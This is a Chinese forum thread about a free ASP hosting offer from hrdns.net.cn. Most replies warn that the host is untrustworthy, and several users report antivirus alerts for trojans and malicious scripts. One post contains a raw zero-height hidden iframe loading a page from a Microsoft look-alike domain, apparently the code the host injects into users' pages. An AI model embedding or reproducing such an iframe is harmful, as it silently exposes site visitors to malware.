免费空间 不多做评论
[table=96%][tr][td][table=98%][tr][td=1,1,100]商品名称[/td][td][color=#f13f23][b]电信免费200M主机[/b][/color][/td][td=1,3][/td][/tr][tr][td]商品编号[/td][td]hrdns[/td][/tr][tr][td]价格[/td][td][color=red]0 [/color]元/年[/td][/tr][/table][/td][td=1,1,80][/td][/tr][tr][td][color=#f13f23]简介:·支持ASP/程序以及Access数据库
·支持Shockwave/Flash/MIDI/mp3等媒体显示
·支持.zip/.rar/.exe/等下载
·支持FSO、Zend、Jmail、AspJepg、动易4.03 动易2005 动易2006等多种流行组件[/color][/td][/tr][/table]申请地址:[url=http://www.hrdns.net.cn/]http://www.hrdns.net.cn/[/url] (天津网通访问比较快)::11::
(由于这个网站自己都没备案让人不太放心........大家小心使用吧) 相当不放心,根本不敢用。
你看他网站上的广告,全是什么成[color=white][/color]人网站。
这样的哪个敢用。
我建议还是不去的安全
哈哈 这个网站还真不让人放心 啊 我的杀毒软件检测到我刚申请的空间有木马还有恶意连接 差点没把我给气死 弄了半天才弄好啊::12:: 什么?????????汗。。。。。。。。::08:: ::08:: ::08:: ::08:: ::08::
还是用5944吧` 不敢用了::18:: ::18:: <iframe src=http://www.microsofl.com.cn/w/hs.htm width=100 height=0></iframe><!-- 如果您不喜欢我们的广告可以购买我们的收费空间 --> 的确瑞星提示恶意脚本站了 ...大家不要去了 给大家带来麻烦了 管理员帮忙把帖子删了吧::12:: 还有病毒::12::
疯了,这也能通过 越来越假
::18:: 都不稳 以前的GOODKJ 因为黑客网站 多了 就被网警抱走服务器了!! 趋势报警.....不敢用 。。。有毒啊 不稳定!不安全!不敢用! *网站......不敢用::18:: 呵呵 有毒啊 有毒拉 根本不敢用啊
页:
[1]
